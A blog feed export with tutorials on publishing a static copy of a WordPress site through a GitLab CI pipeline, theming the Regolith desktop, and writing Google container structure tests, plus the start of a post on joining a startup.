You can find and fork the complete sample code here: https://gitlab.com/sgellweiler/demo-wordpress-static-copy.

Here is the plan in detail. We're going to use the same domain and web space to host both the private WordPress installation and the publicly accessible static copy. We're going to install WordPress into a subdirectory that we will protect with basic auth using a .htaccess file. This is the directory that all your editors, admins and developers will access. The GitLab job will crawl this installation using Wget and deploy the static copy via ssh+rsync into the directory /static on the web space. Then we will use the .htaccess file in the root directory to rewrite all requests to the root path into the static directory. You can configure the GitLab job to run every day, every hour or only manually, depending on your needs.

To follow this guide you should have access to a *NIX shell and have the basic Apache tools (htpasswd), ssh tools (ssh-keygen, ssh-keyscan), find, sed and GNU Wget installed. Some distros ship with a minimal Wget, so make sure that you have the feature-rich version of Wget installed (wget --version).

Setting up the web space

First install WordPress into a subdirectory. For this guide I'm going with wp_2789218. You can go along with this name or choose your own; you should use a unique name though, a string that you will use nowhere else. Best you add a few randomly generated chars in there. We're not doing this for security but to make search+replace for urls easier in the next step. If you go with your own folder name remember to replace all occurrences of wp_2789218 in this guide with your folder name. We'll also add a catchy alias /wp, for you and your coworkers to remember, so don't worry too much about the cryptic name.

Next we create a directory to store our static copy. We'll simply name it static/ and for now just add an index.html with <h1>Hello World</h1> in there.
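On the shell this is quickly done:

mkdir static
echo '<h1>Hello World</h1>' > static/index.html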

Let's configure Apache to password protect our WordPress installation and to redirect requests to /static. First generate a .htpasswd file with user+password at the root level (or at another place) of your web space using:

htpasswd -c /home/pwww/.htpasswd yourusername

Next create a .htaccess on the root level with the following. You need to reference the .htpasswd file with an absolute path in the AuthUserFile:

RewriteEngine On
RewriteBase /

# Setup basic auth
AuthUserFile /var/www/httpdocs/.htpasswd
AuthType Basic
AuthName "Only for trusted employees"

# Require a password for the wp installation.
<RequireAny>
    Require expr %{REQUEST_URI} !~ m#^/wp_2789218#
    Require valid-user
</RequireAny>

# Add an easy to remember alias for the wp installation.
RewriteRule ^wp/(.*) wp_2789218/$1 [R=302,L]
RewriteRule ^wp$ wp_2789218/ [R=302,L]

# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it for the server config part. If you go to your.domain.tld then you should see the Hello World from the index.html in the static directory. If you go to your.domain.tld/wp you should get redirected to your WordPress installation and be forced to enter a password.

Generating a static copy of a website

To make a static copy of your website you need a crawler that will start at your start page, follow all links to sub pages and download them as html including all CSS and JavaScript. We tried out several tools and the one that performed the best by far is the good old GNU Wget. It will reliably download all HTML, CSS, JS and IMG resources. But it will not execute JavaScript and will therefore fail to detect links generated through JavaScript. In this case you might run into problems. However, most simple WordPress sites should be fine from the get-go.

Let’s have a look at the Wget cmd we will use to generate a static copy of our WordPress site:

wget \
    -e robots=off \
    --recursive \
    -l inf \
    --page-requisites \
    --convert-links \
    --restrict-file-names=windows \
    --trust-server-names \
    --adjust-extension \
    --no-host-directories \
    --http-user="${HTTP_USER}" \
    --http-password="${HTTP_PASSWORD}" \
    "https://yourdomain.tld/wp_2789218/" \
    "https://yourdomain.tld/wp_2789218/robots.txt"

Here is an explanation of all the options in use:

  • -e robots=off
    Ignore instructions in the robots.txt.
    This is fine since we're crawling our own website.
  • --recursive
    Follow links to sub directories.
  • -l inf
    Sets the recursion level depth to infinite.
  • --page-requisites
    Download stuff like CSS, JS, images, etc.
  • --convert-links
    Change absolute links to relative links.
  • --restrict-file-names=windows
    Change filenames to be compatible with (old) Windows. This is a useful option even if you're not running on Windows or you will get really ugly names that can cause issues with Apache.
  • --trust-server-names
    Uses the filenames of redirects instead of the source url.
  • --no-host-directories
    Download files directly into wp_2789218 and not into yourdomain.tld.
  • --http-user
    The username used for basic auth to access the wp installation. As defined in your .htpasswd.
  • --http-password
    The password used for basic auth to access the wp installation. As defined in your .htpasswd.
  • "https://yourdomain.tld/wp_2789218/" "https://yourdomain.tld/wp_2789218/robots.txt"
    List of urls to download. We set this to the start page; Wget will recursively follow all links from there.
    We also copy the robots.txt along.

This will generate a static copy of your WordPress installation in wp_2789218. You can test if the crawling worked by opening the index.html in wp_2789218 with a browser.

Wget will try to rewrite urls in HTML and CSS, but in meta tags, inside of JavaScript and in other places it will fail to do so. This is where the unique name of our directory comes into play. Because we named it wp_2789218 and not wordpress, we can now safely search and replace through all files in the dump, and replace every occurrence of wp_2789218/, wp_2789218\/, wp_2789218%2F and wp_2789218 with an empty string ("") so that the links will be correct again in all places. We will use find+sed for that.

Here is the macOS variant of that:

LC_ALL=C find wp_2789218 -type f -exec sed -E -i '' 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

And here is the same for Linux with GNU sed:

find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

To save you the headache: (\\\/|%2F|\/)? will match /, \/, %2F and the empty string ("").

Deploying the static copy to a web space

Now that we have generated a static copy of our website, we want to deploy it to /static on the web space. You can do this over rsync+ssh, if you have ssh access to your server.

The command to do so looks like this:

rsync -avh --delete --checksum wp_2789218 "webspaceuser@yourdomain.tld:static"

Remember to adjust the user, domain and path to the directory in webspaceuser@yourdomain.tld:static to your needs.

For our automated deployment with Gitlab, you should create a new private/public ssh keypair using:

ssh-keygen -m PEM -N "" -C "Deploymentkey for yourdomain.tld" -f deploy

This will create deploy and deploy.pub files in your current directory. Copy the contents of deploy.pub to ~/.ssh/authorized_keys on your remote server to allow ssh-ing with it to your server. You can use this one-liner for that:

cat deploy.pub | ssh webspaceuser@yourdomain.tld -- 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat - >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

Next, test that you have set up everything correctly by ssh-ing to your web space with the new key:

ssh -i deploy webspaceuser@yourdomain.tld

For Gitlab you will need the signature of your remote ssh server. You can generate it with ssh-keyscan. Copy the output of that, because you will need it in the next step:

ssh-keyscan yourdomain.tld

Putting it all together

Now that we have established all the basics it's time to put it all together in one .gitlab-ci.yml file. But first we need to configure a few variables. In your GitLab project go to Settings → CI/CD → Variables and create the following variables:

  • $SSH_ID_RSA
    This is the private key that will be used for rsync to upload the static dir. Put the contents of the deploy file that you created in the step before, in here.
    This should be of type File and state Protected.
  • $SSH_ID_RSA_PUB
    This is the public key that will be used for rsync to upload the static dir. Put the contents of the deploy.pub file that you created in the step before, in here.
    This should be of type File.
  • $SSH_KNOWN_HOSTS
    The known host file contains the signature of your remote host.
    This is the output that you generated with ssh-keyscan.
    This should be of type File.
  • $RSYNC_REMOTE
    Example: webspaceuser@yourdomain.tld:static
    The rsync remote to upload the static copy to. This is in the scheme of user@host:directory.
  • $WORDPRESS_URL
    The url to your wordpress installation. This is the starting point for wget.
    This should be of type Variable.
  • $HTTP_USER
    The user used by wget to access your WordPress installation using basic auth. This is the user that you put in your .htpasswd file.
    This should be of type Variable.
  • $HTTP_PASSWORD
    The password for HTTP_USER used by wget to access your WordPress installation using basic auth.
    This should be of type Variable, state Protected and Masked.

Our GitLab pipeline will have two phases for now: crawl and deploy. They are going to run the commands that we discussed in the previous sections in different docker containers. This is the .gitlab-ci.yml:

stages:
    - crawl
    - deploy

before_script:
    - echo "[INFO] setup credentials for ssh"
    - mkdir ~/.ssh
    - cp "${SSH_ID_RSA}" ~/.ssh/id_rsa
    - cp "${SSH_ID_RSA_PUB}" ~/.ssh/id_rsa.pub
    - cp "${SSH_KNOWN_HOSTS}" ~/.ssh/known_hosts
    - chmod 700 ~/.ssh
    - chmod 600 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub

crawl:
    image:
        name: cirrusci/wget@sha256:3030b225419dc665e28fa2d9ad26f66d45c1cdcf270ffea7b8a80b36281e805a
        entrypoint: [""]
    stage: crawl

    script:
        - rm -rf wp_2789218 static
        - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt"

        - find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;
        - mv wp_2789218 static
    artifacts:
        paths:
            - static/*
        expire_in: 1 month
    only:
        - master

deploy:
    image:
        name: eeacms/rsync@sha256:de654d093f9dc62a7b15dcff6d19181ae37b4093d9bb6dd21545f6de6c905adb
        entrypoint: [""]
    stage: deploy
    script:
        - rsync -avh --delete --checksum static/ "${RSYNC_REMOTE}"
    dependencies:
        - crawl
    only:
        - master

That’s pretty much it, now you have a pipeline that will generate a static copy of your WordPress site and upload that back to your web space. You could set up a schedule for your pipeline to run automatically on a regular basis or you can use the Run Pipeline button to start the process manually.

We would like to add one more step to our pipeline. It's always good to do a little bit of testing, especially if you're executing stuff without supervision. If the crawler fails for whatever reason to download your complete website, you probably want the pipeline to fail before going into the deploy phase and breaking your website for visitors. So let's perform some basic sanity checks on the static copy before starting the deploy phase. The following checks are all very basic and it's probably a good idea to add some more checks that are more specific to your installation. Just check for the existence of some sub pages, images, etc. and grep some strings. Also you probably want to make the existing rules a bit stricter.

stages:
    - crawl
    - verify_crawl
    - deploy

[...]

verify_crawl:
    image: alpine:3.11.3
    stage: verify_crawl
    script:
        - echo "[INFO] Check that dump is at least 1 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -gt 1

        - echo "[INFO] Check that dump is less than 500 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -lt 500

        - echo "[INFO] Check that there are at least 50 files"
        - test "$(find static/ | wc -l)" -gt 50

        - echo "[INFO] Check that there is a index.html"
        - test -f static/index.html

        - echo "[INFO] Look for 'wordpress' in index.html"
        - grep -q 'wordpress' static/index.html
    dependencies:
        - crawl
    only:
        - master

[...]

Adding a contact form

Even the most basic websites usually need a little bit of dynamic functionality; in our case we needed a contact form. We decided to go with Ninja Forms Contact Form. Ninja Forms works by sending requests to wp-admin/admin-ajax.php. This will obviously fail on our static website. To make it work, we will need to reroute requests to admin-ajax.php to our WordPress backend. The admin-ajax.php is used by all sorts of plugins, not only Ninja Forms, and to increase security we want to only whitelist calls for Ninja Forms. Ninja Forms will make a POST request with application/x-www-form-urlencoded and the parameter action set to nf_ajax_submit. Since there is no way (at least none that we know of) in Apache to filter for form parameters, we will need to solve this in PHP. The idea is to create an alternative admin-ajax.php to call instead, that in turn will call the wp-admin/admin-ajax.php in the WordPress backend, but only for Ninja Forms requests. To further increase protection from bots, we will give this alternative file the random name admin-ajax-oAEhFc.php instead of admin-ajax.php and rewrite the urls in the static copy accordingly. This won't really help us against intelligent attackers, but it should stop most bots that try to use an exploit against wp-admin/admin-ajax.php.

First we will need to modify the .gitlab-ci.yml file and add an extra find & sed to the crawl step after wget, to change all urls from "wp-admin/admin-ajax.php" to "admin-ajax-oAEhFc.php":

[...]
- find wp_2789218/ -type f -exec sed -i -E 's/wp-admin(\\\/|%2F|\/)admin-ajax.php/admin-ajax-oAEhFc.php/g' {} \;
[...]

Then we will need to add the admin-ajax-oAEhFc.php to the root of our web space. This file simply checks if this is indeed a Ninja Forms call and then includes the wp-admin/admin-ajax-vhio8powlv.php from the WordPress backend. After that, we will fix any URLs in the output that are still pointing to our WordPress site, so that they point to our static site instead.

<?php 
/* Pass through some functions to the admin-ajax-vhio8powlv.php of the real wp backend. */

// Capture output, so that we can fix urls later.
ob_start();

// Pass through ninja forms
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST) && $_POST['action'] == 'nf_ajax_submit') {
    require (__DIR__ . '/wp_2789218/wp-admin/admin-ajax-vhio8powlv.php');
}

// Everything else should fail.
else {
    echo '0';
}

// Fix urls in output.
$contents = ob_get_contents();
ob_end_clean();


$search_replace = array(
    'wp_2789218/'                => '',
    'wp_2789218\\/'              => '',
    'wp_2789218%2F'              => '',
    'wp_2789218'                 => '',
    'wp-admin/admin-ajax-vhio8powlv.php'    => 'admin-ajax-oAEhFc.php',
    'wp-admin\\/admin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
    'wp-admin%2Fadmin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
);

echo str_replace(array_keys($search_replace), array_values($search_replace), $contents);

Finally we will need to modify the .htaccess file to allow requests to admin-ajax-oAEhFc.php and to not rewrite them to static/.

[...]
# Rewrite all requests to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/admin-ajax-oAEhFc.php$
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it. If you have done everything correctly after running your pipeline again, Ninja Forms should work.

A similar procedure should work for many other plugins too. Though keep in mind that with every plugin you allow access to your backend, you also increase the attack surface.
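For example, to let one more plugin through the pass-through script, you could turn the single action check in admin-ajax-oAEhFc.php into a small whitelist. This is just a sketch of the middle part of the script; the action name some_other_plugin_action is made up, you would have to look up the real action parameter that your plugin sends:

<?php
// Whitelist of allowed AJAX actions (the second entry is a made-up example).
$allowed_actions = array('nf_ajax_submit', 'some_other_plugin_action');

// Pass through whitelisted actions only.
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && !empty($_POST['action'])
    && in_array($_POST['action'], $allowed_actions, true)) {
    require (__DIR__ . '/wp_2789218/wp-admin/admin-ajax-vhio8powlv.php');
} else {
    // Everything else should fail.
    echo '0';
}

The output buffering and the URL fix-up from the original script stay exactly the same.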

Adding a custom 404 page

You may want to have a custom 404 page instead of the standard 404 error page that Apache serves by default. Assuming that you have already created a nice looking 404 page in your WordPress installation, in theory we could just use Wget to make a request to a URL that does not exist and use the output of that. Unfortunately, Wget does a terrible job dealing with non-200 status codes: there is a --content-on-error option that will let it download the contents of a 404 page, but it will refuse to download any images, stylesheets or other resources attached to it.

To deal with that situation we will simply create a normal page in our WordPress backend and use that as a 404 page. So create your page in WordPress and remember the url you gave it.

We can now add that url to our list of files for Wget to download and then use the .htaccess file to redirect all 404 requests to that file.

OK, so let’s add our 404 page to the wget command in the .gitlab-ci.yml file:

 

[...]
    - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt" \
                "${WORDPRESS_URL}/notfound"
[...]

To redirect all 404 errors to notfound/index.html we will have to add one instruction to the .htaccess file:

ErrorDocument 404 /static/notfound/index.html

If you have done everything correctly, after you run your pipeline and visit any non-existing URL you should get your custom error page. However, if you try to access a deeper level like yourdomain.tld/bogus/bogus/bogus, it probably looks pretty messed up, like this:

This is because Wget will rewrite all links to be relative and we access our 404 page from different paths. To fix this we can add a <base> tag inside of the <head> with an absolute url. We insert the base tag with sed after running Wget in the .gitlab-ci.yml like this:

[...]
        - sed -i 's|<head>|<head><base href="/notfound/">|' wp_2789218/notfound/index.html
[...]

And that’s it, if you run your pipeline again the 404 page should look fine:

Conclusion

We have successfully created a Gitlab job that generates and publishes a static copy of a WordPress site and secured the actual WordPress backend against attacks from bots and humans. And because of the 2000 free minutes of CI that Gitlab is currently offering, it didn’t even cost us a dime. If you can live with the limitations of a static website, we definitely recommend this or a similar solution to you. It will push the risk of getting hacked near zero and you will no longer need to spend precious time ensuring that your site and all of its plugins are up to date. Also, your site will be as fast as lightning.

Go ahead and fork: https://gitlab.com/sgellweiler/demo-wordpress-static-copy. And let us know how it works for you in the comment section.

Best regards,

Sebastian Gellweiler

]]>
Regolith Quickstart: Creating a Custom-Theme https://craftcoders.app/regolith-quickstart-creating-a-custom-theme/ Fri, 14 Feb 2020 09:00:21 +0000 https://craftcoders.app/?p=1088 This post is intended for beginners of i3 or, more specifically, Regolith. Since i3 is just a window manager and not a fully fledged desktop environment, you might have encountered some issues using a pure version of i3.

Regolith is a modern desktop environment that saves you time by reducing the clutter and ceremony that stand between you and your work. Built on top of Ubuntu and GNOME, Regolith stands on a well-supported and consistent foundation. (from Regolith website)

Regolith, on the other hand, integrates i3 into Ubuntu and Gnome. Even though I didn’t expect it, Regolith really works like a charm. The only thing that can be tricky at first sight is customization, and that’s what we’re going to tackle right now!

Preview

Here are two sample images of the system we’re trying to create.

Components

Regolith consists of a couple of components to make configuration easier. In the screenshot below you can see where each component comes into play (and how your system should look at the end of this tutorial).

regolith-screenshot

The screenshot can give a first impression, but it doesn’t contain all the components that are involved. Rofi for example can be seen in the second preview picture. Let’s dig a little bit deeper to get a better understanding of configuration:

Here is an overview of each component, what it does, and whose style it influences:

  • i3gaps: a fork of i3 with additional functionality. i3 is a dynamic tiling window manager, but you probably know it already if you chose to read this post. Influences the style of: i3xrocks
  • Xresources: a user-level configuration dotfile, typically located at ~/.Xresources. This is more or less our “root-config” that loads all other component configs. Influences the style of: everything
  • Rofi: provides the user with a textual list of options where one or more can be selected, mostly for running an application or selecting a window.
  • i3xrocks: a Regolith fork of i3blocks that uses Xresources. i3blocks generates a status bar with user-defined blocks, like a clock.
  • compton: a compositor for X based on Dana Jansens’ version of xcompmgr. In short, it renders your display output. Influences the style of: i3gaps, i3xrocks, Rofi

Creating a Custom-Theme

So now we’re getting to the fun part. All the proposed components have their own system-global configuration files. At the end of the Regolith Customize wiki page, you can see each configuration’s location.

Setting a background image

Let’s start out easy. Since Regolith handles the integration between your Ubuntu settings and the i3 window manager, you can use the Ubuntu settings to replace your background image. Hit SUPER+C and navigate to the background tab. If you want, you can download my wallpaper here.
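If you prefer the terminal over the settings dialog, you can most likely set the wallpaper via gsettings as well; the path below is just an example you would replace with your own image:

$ gsettings set org.gnome.desktop.background picture-uri "file:///home/USER/Pictures/wallpaper.jpg"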

Staging configuration files

First, we need to stage the Xresources file, which means to copy it to a user-accessible location. Furthermore, we need to create a folder to stage our other configuration files:

$ cp /etc/regolith/styles/root ~/.Xresources-regolith
$ mkdir ~/.config/regolith/

If you take a look at the Xresources config, you can see that all it does is reference these configurations:

  1. Color theme
  2. System font
  3. GTK Theme
  4. st-term (Regolith default terminal)
  5. i3-wm
  6. i3xrocks
  7. Rofi
  8. Gnome

We’re heading for the files in the “styles” folder. They are only for theming, so don’t confuse them with the config files that change the applications’ behavior, like “~/.config/i3/config”. Let’s stage some of these style configs and apply our new styles:

$ mkdir ~/.config/regolith/styles/
$ cp /etc/regolith/styles/color-nord ~/.config/regolith/styles/custom-coloring
$ cp /etc/regolith/styles/theme-regolith ~/.config/regolith/styles/theme-sweet
$ cp /etc/regolith/styles/i3-wm ~/.config/regolith/styles/i3-wm

A custom coloring scheme

These are the colors that will be used in your desktop environment. Just copy the content into your own file. If you want to define your own colors coolors.co is a good starting point to get inspiration 🙂

--- File: custom-coloring ---

! Custom colors
#define color_base03   #26262d
#define color_base02   #474956
#define color_base01   #4c4d5b
#define color_base00   #c0c3db
#define color_base0    #edf2ff
#define color_base1    #E5E9F0
#define color_base2    #ECEFF4
#define color_base3    #f2f5f9
#define color_yellow   #edcd8e
#define color_orange   #e59572
#define color_red      #e57472
#define color_magenta  #908dc4
#define color_violet   #9d8dc4
#define color_blue     #81A1C1
#define color_cyan     #88C0D0
#define color_green    #A3BE8C

GTK and icon theme

--- File: theme-sweet ---

#define gtk_theme       Sweet-Dark
#define icon_theme      Sweet-Purple

For this to work, you need to copy the Sweet icon-theme and Sweet GTK theme onto your machine. Of course, you are free to choose whatever theme you like. Their names (Sweet-Dark for the theme and Sweet-Purple for the icons) are defined in their config files both named “index.theme”. My setup is available here:

You need to copy them to one of the two possible paths:

Theme: ~/.themes/ or /usr/share/themes/
Icons: ~/.icons/ or /usr/share/icons/ 

i3-wm config

The i3-wm config (for i3gaps) defines which color from our custom-coloring file is used for what. Furthermore, it defines how workspaces are displayed in i3bar and how i3xrocks looks in general. So now is the time to define which workspace should be used for which use-case. In my case I have separate workspaces for

  • Browser
  • Terminals
  • Text Editing (VS-Code)
  • Coding (IDE’s like IntelliJ)
  • Chatting
  • Music

All the other workspaces are used randomly, thus called “Other”.

--- File: i3-wm ---

#define Q(x) #x
#define QUOTE(x) Q(x)

#define glyph typeface_bar_glyph_workspace

i3-wm.bar.font: typeface_bar

i3-wm.bar.background.color: color_base03
i3-wm.bar.statusline.color: color_base00
i3-wm.bar.separator.color: color_yellow
i3-wm.bar.workspace.focused.border.color: color_base02
i3-wm.bar.workspace.focused.background.color: color_base02
i3-wm.bar.workspace.focused.text.color: color_base2
i3-wm.bar.workspace.active.border.color: color_base02
i3-wm.bar.workspace.active.background.color: color_base02
i3-wm.bar.workspace.active.text.color: color_base00
i3-wm.bar.workspace.inactive.border.color: color_base03
i3-wm.bar.workspace.inactive.background.color: color_base03
i3-wm.bar.workspace.inactive.text.color: color_base00
i3-wm.bar.workspace.urgent.border.color: color_red
i3-wm.bar.workspace.urgent.background.color: color_red
i3-wm.bar.workspace.urgent.text.color: color_base3

i3-wm.client.focused.color.border: color_base03
i3-wm.client.focused.color.background: color_base01
i3-wm.client.focused.color.text: color_base3
i3-wm.client.focused.color.indicator: color_blue
i3-wm.client.focused.color.child_border:

i3-wm.client.focused_inactive.color.border: color_base03
i3-wm.client.focused_inactive.color.background: color_base02
i3-wm.client.focused_inactive.color.text: color_base0
i3-wm.client.focused_inactive.color.indicator: color_base02
i3-wm.client.focused_inactive.color.child_border:

i3-wm.client.unfocused.color.border: color_base03
i3-wm.client.unfocused.color.background: color_base02
i3-wm.client.unfocused.color.text: color_base0
i3-wm.client.unfocused.color.indicator: color_base02
i3-wm.client.unfocused.color.child_border:

i3-wm.client.urgent.color.border: color_base03
i3-wm.client.urgent.color.background: color_red
i3-wm.client.urgent.color.text: color_base3
i3-wm.client.urgent.color.indicator: color_red
i3-wm.client.urgent.color.child_border:

#define glyph_font QUOTE(typeface_bar_glyph)
#define WORKSPACE_NAME(INDEX, NAME, FONT) INDEX<span font_desc=FONT> INDEX: NAME </span>

i3-wm.workspace.01.name: WORKSPACE_NAME(1, BR0WSER, glyph_font)
i3-wm.workspace.02.name: WORKSPACE_NAME(2, T3RM, glyph_font)
i3-wm.workspace.03.name: WORKSPACE_NAME(3, ED1T1NG, glyph_font)
i3-wm.workspace.04.name: WORKSPACE_NAME(4, C0D1NG, glyph_font)
i3-wm.workspace.05.name: WORKSPACE_NAME(5, C0D1NG, glyph_font)
i3-wm.workspace.06.name: WORKSPACE_NAME(6, 0TH3R, glyph_font)
i3-wm.workspace.07.name: WORKSPACE_NAME(7, 0TH3R, glyph_font)
i3-wm.workspace.08.name: WORKSPACE_NAME(8, 0TH3R, glyph_font)
i3-wm.workspace.09.name: WORKSPACE_NAME(9, CH4T, glyph_font)
i3-wm.workspace.10.name: WORKSPACE_NAME(10, MUS1C, glyph_font)
i3-wm.workspace.11.name: WORKSPACE_NAME(11, 0TH3R, glyph_font)
i3-wm.workspace.12.name: WORKSPACE_NAME(12, 0TH3R, glyph_font)
i3-wm.workspace.13.name: WORKSPACE_NAME(13, 0TH3R, glyph_font)
i3-wm.workspace.14.name: WORKSPACE_NAME(14, 0TH3R, glyph_font)
i3-wm.workspace.15.name: WORKSPACE_NAME(15, 0TH3R, glyph_font)
i3-wm.workspace.16.name: WORKSPACE_NAME(16, 0TH3R, glyph_font)
i3-wm.workspace.17.name: WORKSPACE_NAME(17, 0TH3R, glyph_font)
i3-wm.workspace.18.name: WORKSPACE_NAME(18, 0TH3R, glyph_font)
i3-wm.workspace.19.name: WORKSPACE_NAME(19, 0TH3R, glyph_font)

Using our new configurations

Now we can finally make use of our new config files. Therefore, we need to replace the references in our .Xresources-regolith file. In the end it should look something like this (make sure to replace USER with your username):

--- File: .Xresources-regolith ---

! This is the Regolith root-level Xresources file.
!
! -- Styles - Colors
!
! Uncomment one and only one of the following color definitions: 
#include "/home/USER/.config/regolith/styles/custom-coloring"

! -- Styles - Fonts
! NOTE: Font packages may need to be installed when enabling typefaces.
! Uncomment one and only one of the following font definitions:
#include "/etc/regolith/styles/typeface-sourcecodepro"
!#include "/etc/regolith/styles/typeface-ubuntu"

! -- Styles - Theme
! NOTE: GTK theme and icon packages may need to be installed when enabling themes.
! Uncomment one and only one of the following theme definitions:
!
#include "/home/USER/.config/regolith/styles/theme-sweet"

! -- Applications
! These files map values defined above into specific app settings.
#include "/etc/regolith/styles/st-term"
#include "/home/USER/.config/regolith/styles/i3-wm"
#include "/etc/regolith/styles/i3xrocks"
#include "/etc/regolith/styles/rofi"
#include "/etc/regolith/styles/gnome"

As you can see, we also replaced the system font, switching from typeface-ubuntu to typeface-sourcecodepro. Now save, log out and back in, so that your changes can be applied.
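If you want to preview your changes without logging out, reloading the Xresources and restarting i3 may already be enough. Take this as a shortcut that is not guaranteed to pick up every setting (the GTK theme, for example), so a re-login is still the safe option:

$ xrdb -merge ~/.Xresources-regolith
$ i3-msg restart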

Conclusion

That’s it! Now your system should be really similar to the screenshots above 🙂 As you can see, customization is pretty straightforward as soon as you have a basic understanding of the components used and their configurations. If you want, take a look at staging your own i3 and i3xrocks config files to use your new desktop environment to the fullest. Alternatively, you can take a look at my dotfiles to get a glimpse of my system. Whatever you do, have fun tweaking your UI!

Greetings, Domi

]]>
Sophisticated Google container structure tests https://craftcoders.app/sophisticated-google-container-structure-tests/ Mon, 20 May 2019 08:00:39 +0000 https://craftcoders.app/?p=1043 Last week we did an innovation week at our company, crowding up together and trying to figure out what can be done to improve our systems. Our group chose to set up a private docker registry and to automate the creation of docker images for our test system. After some research we came up with Google’s framework named container structure tests, to verify that the automatically created containers are actually working.

The Container Structure Tests provide a powerful framework to validate the structure of a container image. These tests can be used to check the output of commands in an image, as well as verify metadata and contents of the filesystem.

GoogleContainerTools @ Github

As always: you can create very simple test scenarios very fast, but there is little documentation when it comes to more complicated stuff. With this post I want to sum up the pitfalls you might encounter and offer solutions, so you can get the most out of the framework. If you need to know the basic stuff first, jump over to the read-me and come back later 😉

Pitfalls and solutions

Image entry-points are removed by default

Every docker container comes with an entry-point defining what it should do on startup. These can influence the structure of the container or consume a lot of time, so they are removed by default. In our case we needed the entry-point, since we wanted to test whether our PostgreSQL container is working properly. What you should do (according to the docs) is using the setup section of the test like so:

commandTests:
  - name: "postgres starts without errors"
    setup:
      - ["./docker-entrypoint.sh", "postgres"]
    command: "psql"
    args: ["-d", "db-name", "-U", "db-user", "-c", "\q"]

This small test should start a new container, run the entrypoint script for postgres and finally check that we can connect to a database without any error. The exit code is expected to be zero by default. Sadly, this is not how it actually works as you will see in the next section.

Every command runs in a separate container instance

The setup section, and the teardown section as well, is a list of commands, whereas the command section is just a single command. All of these commands run in their own separate container, which then commits a modified image to be the new base image for the next command in the list. Since in our Postgres example the entrypoint is starting a database in a setup command, this database will be running in this command’s container only. This leads to the need for multiple commands in the same container, which we can’t accomplish using the setup section.

Multi-line commands

We can trick the framework to run multiple commands in the same container using bash -c <list of commands>. Since this can get convoluted pretty fast, we can make use of YAML’s “literal style” option (the | sign) to preserve newlines.

  - name: "postgres starts without errors"
    command: "bash"
    args:
      - -c
      - |
          bash -c './docker-entrypoint.sh postgres &' &&
          sleep 10 &&
          psql -d "db-name" -U "db-user" -c '\q'

This is the final (and actually working) version of the same test. As you can see, we are now running the docker-entrypoint script in the same container as the psql command. But since the script starts a database instance, we had to wrap it in a second bash -c command so we could detach it from the console output with the ampersand (&) at the end. Furthermore, we had to add some sleep time to give the database a chance to come up before we check if it is working.
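For completeness, a test file like the one above is typically run with the container-structure-test binary against an already built image. Image name and file name here are placeholders for your own:

container-structure-test test \
    --image my-registry/postgres-test:latest \
    --config postgres-structure-tests.yaml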

Switching user profiles

Sometimes it might be necessary to run a command as a different user than root. As user postgres for example 😀 Fortunately, this can be accomplished similar to bash -c using su -c like that:

  - name: "run a command as a different user"
    command: "su"
    args:
      - postgres
      - -c
      - whoami
    expectedOutput: ["postgres"]

Alrighty, that’s all I wanted to share for now. I hope this post will save you some time. Please keep in mind that Google’s container structure tests framework has been made to verify the structure and general setup of your container. It is not meant to be used for something like integration tests. Thanks for reading and have a nice day 🙂

Greets, Domi

]]>
Startup: To join or not to join? https://craftcoders.app/startup-to-join-or-not-to-join/ Mon, 04 Feb 2019 09:00:19 +0000 https://craftcoders.app/?p=955 Hey everybody. A few days ago a friend of mine asked me for advice about joining or not joining a startup. After I answered him, I got excited to share my condensed thoughts with you in this blog post. He asked me since I was very enthusiastic about founding my own startup. Back in the day, I told him about my idea and my friends who’d be joining me in that adventure.

Boy, was I refreshingly naive! Not naive enough to actually start something just like that without getting informed and involved first, but naive enough to dig into the whole startup topic. Below you will find a starter pack of my personal recommendations on the topic. But first, let’s get to business…

What’s the situation?

Soon, he will finish his dissertation in medical engineering. A really smart, friendly and quick-witted guy. A friend of his asked him what he wants to do after he’s done with the diss. After they talked, he ended up with an offer: he can get involved in the startup his friend founded. He’d get paid way under his market value, but would own company shares. Wow! What a tricky situation. Tough call, I’d say. This led to him asking me how much such a startup can be worth, unfortunately without any further context.

Obviously, there is no clear number I could tell him, no yes-or-no, no dos-or-don’ts. Instead, I tried to convert my current state of mind into a dense checklist. He could use my thoughts to check whether it could be a proper investment.

My advice

I tried to roughly differentiate between four main criteria-categories. All can be crucial for taking this decision:

  1. The Problem
  2. Strategy and Methodology
  3. Figures
  4. You

Just remember: the answers gotta fit your liking. There’s no “good vs. bad”. In most cases, there is no right or wrong – it is entirely up to your thoughts, preferences and personal plans.

Point 1 – The Problem

Meaning the problem the startup should be called to solve.

  • Do you yourself believe that enough people have this problem AND want to solve it AND don’t want to solve it well enough in another way?
  • How much work has been invested into the startup already?
